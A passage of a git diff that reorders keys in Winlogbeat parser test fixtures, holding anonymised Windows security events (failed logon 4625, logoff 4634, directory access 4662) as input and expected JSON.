Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json index ddc69e63b..035469c13 100644 --- a/Beats/winlogbeat/tests/security_event_4634.json +++ b/Beats/winlogbeat/tests/security_event_4634.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json index 3d80320f5..3f1de8e53 100644 --- a/Beats/winlogbeat/tests/security_event_4662.json +++ b/Beats/winlogbeat/tests/security_event_4662.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + } }, "expected": { "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 